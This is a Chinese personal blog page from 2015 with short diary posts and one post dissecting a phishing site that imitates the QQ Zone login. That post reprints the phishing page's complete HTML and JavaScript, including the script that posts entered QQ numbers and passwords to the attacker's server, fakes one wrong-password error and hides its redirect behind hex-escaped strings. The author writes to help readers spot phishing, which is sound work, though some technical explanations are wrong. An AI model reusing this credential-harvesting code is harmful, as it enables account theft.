增加了新表情

2015-8-13 Le le's writing

      继添加了贴吧的两个表情后,又给评论增加了4个来自微博的表情,快点尝试一下吧。

评论(23) 浏览(4204)

分析一个拙劣的钓鱼网站的伎俩

2015-8-11 Le le's writing

      那天无聊刷着QQ空间,发现一个同学分享了一个链接,如图所示
p11sb.jpg
      我以为真的是哪次聚会拍的照片他分享在了一个网站上,然后我就打开了这个陌生的网址,打开后如图所示
QQ截图20150811084552.jpg

      乍一看,呦,这不是要登录自己的QQ嘛,因为这个QQ空间有权限的,会让你自然而然的就去输入 QQ号和密码登陆,但是关键就在这里,你随便输入帐号和密码也进去了,显然就是一个钓鱼的盗号网站,如果你的习惯比较好,你可能会选择扫描二维码登陆,恰恰这个扫描二维码就是一个摆设,无论你怎么扫描都进不去的,为什么说这个方式拙劣呢,因为这个网址就不是QQ官方的,基本一眼就能看出来,这一看就是个普通的三级域名,所以以后在源头就可以扼杀这样的行为,只要你把眼睛擦亮就行了,也怪我当时大意了,没多想。输入帐号进去后,就跳转到了一个普通的QQ空间,里面的照片也是钓鱼者静心设计过的,让你以为真的是聚会的照片,结果全是陌生的人。
好了,前言结束了,接下来我来彻底的剖析这个伎俩。首先右击钓鱼网页,点击查看源文件,打开这个网页的源码。
QQ截图20150811085251.jpg
下面我贴出整个源码。
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<style type="text/css">
body{margin: 0; padding: 0; border: 0; background: #fff;}
.login{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat; width: 622px; height: 368px;}
.login_main{padding:72px 0 0 315px;}
.login input{margin: 3px 0 0 30px; padding: 10px 0 8px 0px; height: 18px; width: 215px; font-size: 16px; background: 0; border: 0; outline: 0;}
.alert{width: 248px; height: 28px; margin: 0 0 3px 0;}
.username_div{width: 249px; height: 42px; background: url(http://xx.2x360.com/Login/1/default.png) no-repeat 0px -369px;}
.password_div{width: 249px; height: 42px; background: url(http://xx.2x360.com/Login/1/default.png) no-repeat 0px -412px; margin: 13px 0 0 0;}
.login_button{width: 91px; height: 35px; background: url(http://xx.2x360.com/Login/1/default.png) no-repeat -500px -369px; margin: 19px 0 0 0; cursor: pointer; border: 0; outline: 0;}
.username_div:hover{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat -250px -369px;}
.password_div:hover{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat -250px -412px;}
.login_button:hover{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat -500px -405px;}
.username_div_focus{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat 0px -455px !important;}
.password_div_focus{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat -250px -455px !important;}
.no_num{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat 0px -498px;}
.no_pas{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat -249px -498px;}
.pas_no{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat 0px -527px;}
</style>
</head>
<body>
<div class="login">
<div class="login_main">
<div class="alert" id="alert"></div>
<div class="username_div" id="username_div">
<input type="text" name="username" id="username" value="" />
</div>
<div class="password_div" id="password_div">
<input type="password" name="password" id="password" value="" />
</div>
<div class="button_div">
<button type="button" class="login_button" id="login_button"></button>
</div>
</div>
</div>
<script src="http://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
<script type="text/javascript">
var t = 0;
$('#login_button').on('click',function(){
var xxoo = $('#username').val();
var ooxx = $('#password').val();
if(xxoo==''){
$('#alert').addClass('no_num');
$('#username').focus();
return false;
}
if(ooxx==''){
$('#alert').addClass('no_pas');
$('#password').focus();
return false;
}
$.post('/Index/Post.html',{xxoo:xxoo,ooxx:ooxx,uuuu:'3'},function(data){
if(t==0){
$('#alert').addClass('pas_no');
$('#password').val("");
$('#password').focus();
t++;
}else{
var _$=["\x6c\x6f\x63\x61\x74\x69\x6f\x6e","\x68\x72\x65\x66","\x68\x74\x74\x70\x3a\x2f\x2f\x75\x73\x65\x72\x2e\x71\x7a\x6f\x6e\x65\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x34\x30\x33\x33\x38\x32\x30\x33\x31\x2f\x34"];
top[_$[0]][_$[1]]=_$[2];
}
});
});
//私有区域
$("#username").on('focus',function() {
$("#username_div").addClass('username_div_focus');
});
$("#password").on('focus',function() {
$("#password_div").addClass('password_div_focus');
});
$("#username").on('blur',function() {
$("#username_div").removeClass('username_div_focus');
})
$("#password").on('blur',function() {
$("#password_div").removeClass('password_div_focus');
});
$('input').on('keyup',function() {
if ($(this).val() == '') {
$(this).css('background', '0');
} else {
$(this).css('background', '#fff');
}
});
</script>
</body>
</html>


      从源码的第九行就暴露了。【.login{background: url(http://xx.2x360.com/Login/1/default.png) no-repeat; width: 622px; height: 368px;}】这段css源码的意思是,登陆的背景是调用的http://xx.2x360.com/Login/1/default.png这张图片,好的,让我把这张图片下载下来看看。
default.png
     钓鱼者真是煞费苦心, 登陆页面做的极为逼真。通过CSS精心调校了登录框的大小,做到和官方基本一致。
接着往下分析源码,真正的关键来了。
var t = 0;
$('#login_button').on('click',function(){
var xxoo = $('#username').val();
var ooxx = $('#password').val();
if(xxoo==''){
$('#alert').addClass('no_num');
$('#username').focus();
return false;
}
if(ooxx==''){
$('#alert').addClass('no_pas');
$('#password').focus();
return false;
}
$.post('/Index/Post.html',{xxoo:xxoo,ooxx:ooxx,uuuu:'3'},function(data){
if(t==0){
$('#alert').addClass('pas_no');
$('#password').val("");
$('#password').focus();
t++;
}else{
var _$=["\x6c\x6f\x63\x61\x74\x69\x6f\x6e","\x68\x72\x65\x66","\x68\x74\x74\x70\x3a\x2f\x2f\x75\x73\x65\x72\x2e\x71\x7a\x6f\x6e\x65\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x34\x30\x33\x33\x38\x32\x30\x33\x31\x2f\x34"];
top[_$[0]][_$[1]]=_$[2];
}
});
});
      钓鱼者通过php定义了变量以及单击鼠标的行为, 定义变量xxoo为输入的帐号,定义变量ooxx为输入的密码(不得不说这变量名字取得真邪恶,可见钓鱼者是个极其猥琐之人。)用val()函数将由数字符号(包括正负号、小数点)组成的字符型数据转换成相应的数值型数据。接着作者加入了条件语句,如果帐号密码为空则返回错误信息。接着 $.post('/Index/Post.html',{xxoo:xxoo,ooxx:ooxx,uuuu:'3'},function(data)这句语句终于彻头彻尾的出卖了钓鱼者的真实想法,在 PHP 中,预定义的 $_POST 变量用于收集来自 method="post" 的表单中的值,简而言之就是钓鱼者将登录框的帐号密码以帐号:密码的格式通过POST方法发送到了post.html网页之中,他还机智的将一些不符合的值进行了排除例如 if(t==0)$('#alert').addClass('pas_no');。
到此我基本就分析完毕了,一双善于观察的眼睛,会让你以后远离这种低劣的钓鱼盗号方式。

本文若有错误以及不足 ,欢迎指正。
本文为原创,转载请注明出处,翻版必究。

评论(23) 浏览(4815)

雨后天晴

2015-8-6 Le le's writing

psb.jpgpsb1.jpg光影魔术手拼图.jpg

      雨后的徐州格外美,原图太大快20M一张,上传的太慢好纠结啊,就放弃了,第二张你能找到我吗?

评论(2) 浏览(1410)

八月你好

2015-8-2 Le le's writing

QQ图片20150802083207.png

       昨天是扒衣见君节(八一建军节),是爸爸的节日,可惜爸爸还是奋斗在演习的第一线,军官加上医生的双重身份让他的责任重大,所以在这里给他道一声迟到的节日快乐吧。转眼间也到了八月了,骄阳更加似火,知了也是玩了命的叫着,生怕过了夏天,还没有叫够。放假的日子是悠闲的,想什么时候起床就什么时候起床,睡觉和吃饭也没有个固定的时间,但是放假的时间一长就想着开学,人嘛,总是这样纠结的。

(photo by @西华大学乐乐哥哥 in 徐州大龙湖

评论(14) 浏览(1558)

大热天的

2015-7-28 Le le's writing

QQ图片20150728103639.png

      继热伤风之后,昨天发现竟然长了一颗智齿,还以为是我的蛀牙疼呢,唉,搞的牙龈都肿了,真的好难受啊,真是屋漏偏逢连夜雨,昨天由于下大雨,家里的电路也 短路了,找人来看,说是装修时都布线在墙内,不好弄,是个大工程,导致我的屋内没有电了,电脑空调全部不能用了,只能转移阵地,全部搬到客厅去,好烦哦。 转眼间暑假也过了一半了,整个人都浑浑噩噩的,期待赶紧开学。

评论(7) 浏览(1350)

我尼玛热伤风了

2015-7-26 Le le's writing

QQ图片20150726214803.jpg

你能想象的出大热天的流鼻涕是个什么样的场景吗,自行脑补。谢谢qiukong.com(基佬?)哈哈这两天帮我的,抚摸一下你的juhua。

评论(2) 浏览(3294)

我都放假半个月了

2015-7-9 Le le's writing

      从忙完期末考试到现在放假半个月了,经历了好多感动的,辛酸的事,生命总是在轮回。放假好无聊,琢磨给网站改版。

评论(32) 浏览(2996)

Powered by emlog 蜀ICP备15031413号